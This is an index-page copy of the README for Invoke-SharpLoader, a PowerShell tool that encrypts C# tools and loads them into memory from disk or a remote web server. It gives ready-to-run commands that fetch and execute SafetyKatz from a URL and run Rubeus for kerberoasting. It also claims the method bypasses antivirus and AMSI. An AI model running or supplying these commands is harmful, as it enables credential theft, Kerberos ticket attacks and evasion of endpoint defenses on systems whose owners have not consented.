Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader


https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader

Last synced: 22 days ago
JSON representation

Awesome Lists containing this project

README 

        
# Invoke-SharpLoader

Load encrypted and compressed C# Code from a remote Webserver or from a local file straight to memory and execute it there.



Two scripts are used here. Invoke-SharpEncrypt can be used to encrypt existing C# files. To do this, the following example command can be used.



### Encrypt C# file:



`Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc`



Only full paths to the file are accepted at this point. The encrypted files generated by Invoke-SharpEncrypt can then be hosted on a web server on the Internet or stored on the target system on disk.

Invoke-SharpLoader can be used to decrypt and execute the files in memory. Two examples demonstrate how to load a file from a remote webserver or from disk.



### Load from URL:



`Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs`



### Load from DISK:



`Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"`



This project was heavily inspired by Cn33liz p0wnedLoader repo here https://github.com/Cn33liz/p0wnedLoader. By encrypting own executables with a 

custom password and hosting them somewhere on the internet nearly all local and Proxy AV-Protections and AMSI can be bypassed. :-)